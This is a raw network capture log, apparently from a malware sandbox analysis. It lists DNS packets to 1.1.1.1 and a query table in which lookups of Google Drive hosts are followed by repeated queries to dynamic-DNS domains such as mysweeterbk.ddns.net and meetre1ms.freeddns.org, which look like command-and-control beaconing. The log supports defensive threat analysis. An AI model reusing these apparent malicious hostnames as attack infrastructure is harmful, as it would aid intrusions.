                                                                                                Nov 30, 2024 21:22:26.039719105 CET5864553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:26.177804947 CET53586451.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:26.895644903 CET5024453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:27.033402920 CET53502441.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:28.894454956 CET6417553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:29.032239914 CET53641751.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:29.894033909 CET5747653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:30.033364058 CET53574761.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:30.893975973 CET5261153192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:31.031441927 CET53526111.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:31.032670975 CET5194053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:31.170001030 CET53519401.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:31.896282911 CET5458053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:32.033715963 CET53545801.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:33.901356936 CET5155453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:34.040313005 CET53515541.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:34.897907019 CET5654453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:35.036195040 CET53565441.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:35.894407988 CET6362753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:36.032011986 CET53636271.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:36.033179998 CET5136253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:36.171250105 CET53513621.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:36.893930912 CET5736753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:37.031719923 CET53573671.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:38.896024942 CET6361953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:39.033891916 CET53636191.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:39.893729925 CET6365553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:40.032228947 CET53636551.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:41.044411898 CET5475553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:41.185431004 CET53547551.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:41.208519936 CET4926353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:41.346797943 CET53492631.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:41.894480944 CET5824253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:42.032397985 CET53582421.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:44.160908937 CET5709053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:44.311522007 CET53570901.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:44.894124985 CET5812753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:45.031418085 CET53581271.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:45.894345045 CET5111853192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:46.031945944 CET53511181.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:46.032603025 CET6419253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:46.170934916 CET53641921.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:46.894747972 CET5789153192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:47.036725998 CET53578911.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:48.894639969 CET5226953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:49.032753944 CET53522691.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:49.894375086 CET5608453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:50.032308102 CET53560841.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:50.894263983 CET5225653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:51.032787085 CET53522561.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:51.033308029 CET6072653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:51.171475887 CET53607261.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:51.174865007 CET6072653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:51.312465906 CET53607261.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:51.893868923 CET5468953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:52.031429052 CET53546891.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:53.895992041 CET5905153192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:54.034245968 CET53590511.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:54.894814014 CET6291753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:55.032613039 CET53629171.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:55.893929958 CET4995753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:56.031532049 CET53499571.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:56.032218933 CET5182253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:56.169811010 CET53518221.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:56.894174099 CET5662253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:57.032494068 CET53566221.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:58.987997055 CET6016353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:22:59.129470110 CET53601631.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:22:59.893984079 CET5295953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:00.034337997 CET53529591.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:00.893949032 CET5643853192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:01.036710024 CET53564381.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:01.039454937 CET5135253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:01.176973104 CET53513521.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:02.390722036 CET5264153192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:02.529261112 CET53526411.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:03.895972967 CET5662853192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:04.033869028 CET53566281.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:05.071913004 CET5612853192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:05.209526062 CET53561281.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:05.900295973 CET5630353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:06.038045883 CET53563031.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:06.042884111 CET6016153192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:06.181725979 CET53601611.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:06.894731045 CET4939553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:07.032265902 CET53493951.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:08.893817902 CET5942953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:09.033204079 CET53594291.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:09.894622087 CET5098753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:10.032747984 CET53509871.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:10.894462109 CET5446653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:11.032233000 CET53544661.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:11.033781052 CET4970253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:11.170969009 CET53497021.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:11.893923998 CET5991553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:12.031757116 CET53599151.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:13.894675970 CET6090253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:14.032701015 CET53609021.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:14.921612978 CET5142553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:15.059763908 CET53514251.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:15.893888950 CET5022253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:16.033082008 CET53502221.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:16.033884048 CET5936553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:16.174874067 CET5936553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:16.175368071 CET53593651.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:16.315465927 CET53593651.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:16.894491911 CET5079753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:17.033974886 CET53507971.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:18.894267082 CET6376953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:19.032387972 CET53637691.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:19.894587040 CET5036953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:20.033411026 CET53503691.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:20.912005901 CET5398353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:21.049823999 CET53539831.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:21.056905985 CET5799553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:21.194648981 CET53579951.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:21.894498110 CET5062453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:22.036382914 CET53506241.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:23.894733906 CET5259653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:24.032818079 CET53525961.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:24.897948027 CET5905953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:25.036967039 CET53590591.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:25.893898010 CET5726553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:26.031646967 CET53572651.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:26.032262087 CET5436053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:26.169893026 CET53543601.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:26.896938086 CET6534353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:27.037770987 CET53653431.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:28.894193888 CET5735953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:29.031872988 CET53573591.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:29.893872976 CET5621053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:30.031769991 CET53562101.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:31.042069912 CET5062253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:31.180980921 CET53506221.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:31.323503017 CET4998253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:31.462622881 CET53499821.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:31.897393942 CET4999053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:32.035029888 CET53499901.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:33.917188883 CET6127053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:34.055821896 CET53612701.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:34.898171902 CET4959453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:35.038058043 CET53495941.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:35.904215097 CET5088953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:36.041708946 CET53508891.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:36.042309999 CET6334853192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:36.179821968 CET53633481.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:36.893954039 CET5830353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:37.036088943 CET53583031.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:38.894542933 CET5355753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:39.033771992 CET53535571.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:39.894397974 CET5072353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:40.032119989 CET53507231.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:40.894722939 CET6308453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:41.032737970 CET53630841.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:41.034581900 CET5010553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:41.172506094 CET53501051.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:41.894500971 CET5194253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:42.032419920 CET53519421.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:43.894792080 CET6532753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:44.032227993 CET53653271.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:44.912839890 CET5717253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:45.057555914 CET53571721.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:45.894596100 CET5403553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:46.032932997 CET53540351.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:46.033504963 CET5329253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:46.173079014 CET53532921.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:46.896095991 CET6228653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:47.036376953 CET53622861.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:48.895133972 CET5905853192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:49.032840014 CET53590581.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:49.894546986 CET6367053192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:50.033149958 CET53636701.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:50.933762074 CET6362953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:51.071342945 CET53636291.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:51.089996099 CET5839653192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:51.227725029 CET53583961.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:51.894078016 CET6278253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:52.033319950 CET53627821.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:53.967255116 CET5866753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:54.105110884 CET53586671.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:54.894319057 CET5786353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:55.032008886 CET53578631.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:55.896119118 CET5961753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:56.033998966 CET53596171.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:56.039056063 CET6139153192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:56.176542997 CET53613911.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:56.894437075 CET5757853192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:57.034570932 CET53575781.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:58.894309998 CET5921453192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:23:59.035414934 CET53592141.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:23:59.893861055 CET6260753192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:00.034126997 CET53626071.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:00.894426107 CET6163253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:01.032318115 CET53616321.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:01.032838106 CET5898953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:01.175004959 CET5898953192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:01.176018953 CET53589891.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:01.315201044 CET53589891.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:01.894547939 CET5310153192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:02.034182072 CET53531011.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:06.316018105 CET6432353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:06.454674959 CET53643231.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:06.455260038 CET5215553192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:06.592855930 CET53521551.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:06.593436956 CET5227253192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:06.732630014 CET53522721.1.1.1192.168.2.4
                                                                                                Nov 30, 2024 21:24:06.733108044 CET6022353192.168.2.41.1.1.1
                                                                                                Nov 30, 2024 21:24:06.870774984 CET53602231.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 30, 2024 21:19:58.788635015 CET192.168.2.41.1.1.10x56e2Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:01.868774891 CET192.168.2.41.1.1.10xfb50Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:13.051811934 CET192.168.2.41.1.1.10xe2eeStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:13.921463013 CET192.168.2.41.1.1.10xcc92Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:14.165776968 CET192.168.2.41.1.1.10x25d6Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:14.399770975 CET192.168.2.41.1.1.10xb7b2Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:14.729773045 CET192.168.2.41.1.1.10x953aStandard query (0)myumysmeetr.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:14.960141897 CET192.168.2.41.1.1.10xd80bStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:18.373158932 CET192.168.2.41.1.1.10x4194Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:19.524996042 CET192.168.2.41.1.1.10x6726Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:19.664894104 CET192.168.2.41.1.1.10xf3ccStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:19.811276913 CET192.168.2.41.1.1.10x2d25Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:19.953778028 CET192.168.2.41.1.1.10xce21Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:23.181216002 CET192.168.2.41.1.1.10xd8c7Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:24.356708050 CET192.168.2.41.1.1.10x8044Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:24.496412039 CET192.168.2.41.1.1.10xa748Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:24.638699055 CET192.168.2.41.1.1.10xa4ffStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:25.968305111 CET192.168.2.41.1.1.10x57c8Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:28.927884102 CET192.168.2.41.1.1.10xc842Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:29.066862106 CET192.168.2.41.1.1.10xf0d5Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:29.206114054 CET192.168.2.41.1.1.10x4febStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:29.344914913 CET192.168.2.41.1.1.10x7bb4Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:31.508605957 CET192.168.2.41.1.1.10xaa02Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:34.742742062 CET192.168.2.41.1.1.10xe99cStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:34.883137941 CET192.168.2.41.1.1.10x658dStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:35.031610966 CET192.168.2.41.1.1.10xd9ccStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:35.170341969 CET192.168.2.41.1.1.10x4f37Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:36.414865971 CET192.168.2.41.1.1.10x83f3Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:39.597009897 CET192.168.2.41.1.1.10x266dStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:40.739792109 CET192.168.2.41.1.1.10xb478Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:40.879400969 CET192.168.2.41.1.1.10xe5cbStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:41.037494898 CET192.168.2.41.1.1.10xbe07Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:41.207196951 CET192.168.2.41.1.1.10x33a9Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:44.380466938 CET192.168.2.41.1.1.10xf94bStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:45.534804106 CET192.168.2.41.1.1.10xef6fStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:46.690948963 CET192.168.2.41.1.1.10xaaf6Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:46.866139889 CET192.168.2.41.1.1.10xece2Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:47.011625051 CET192.168.2.41.1.1.10x29f0Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:49.175127029 CET192.168.2.41.1.1.10x5bedStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:50.331707954 CET192.168.2.41.1.1.10xe7fdStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:51.472702026 CET192.168.2.41.1.1.10x3942Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:51.612708092 CET192.168.2.41.1.1.10x6e47Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:52.775780916 CET192.168.2.41.1.1.10x91d2Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:53.925158978 CET192.168.2.41.1.1.10x585cStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:55.079088926 CET192.168.2.41.1.1.10xc9f8Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:56.191185951 CET192.168.2.41.1.1.10x194fStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:56.331583977 CET192.168.2.41.1.1.10x5937Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:57.410475969 CET192.168.2.41.1.1.10xdc16Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:59.347059011 CET192.168.2.41.1.1.10x42afStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:00.359288931 CET192.168.2.41.1.1.10x551bStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:01.336260080 CET192.168.2.41.1.1.10x1c72Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:01.481594086 CET192.168.2.41.1.1.10x5a07Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:02.425920010 CET192.168.2.41.1.1.10xfab2Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:04.086724997 CET192.168.2.41.1.1.10x64a3Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:04.956564903 CET192.168.2.41.1.1.10x40f5Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:06.472410917 CET192.168.2.41.1.1.10xa052Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:06.610152006 CET192.168.2.41.1.1.10x3a83Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:07.395179987 CET192.168.2.41.1.1.10xf149Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:09.362833977 CET192.168.2.41.1.1.10x3e8bStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:10.081568956 CET192.168.2.41.1.1.10x37f8Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:11.300690889 CET192.168.2.41.1.1.10x7e3bStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:11.440706968 CET192.168.2.41.1.1.10xb596Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:12.097825050 CET192.168.2.41.1.1.10x881Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:14.143867970 CET192.168.2.41.1.1.10x5609Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:15.144154072 CET192.168.2.41.1.1.10x7e2cStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:16.081947088 CET192.168.2.41.1.1.10x4226Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:16.223571062 CET192.168.2.41.1.1.10x9cccStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
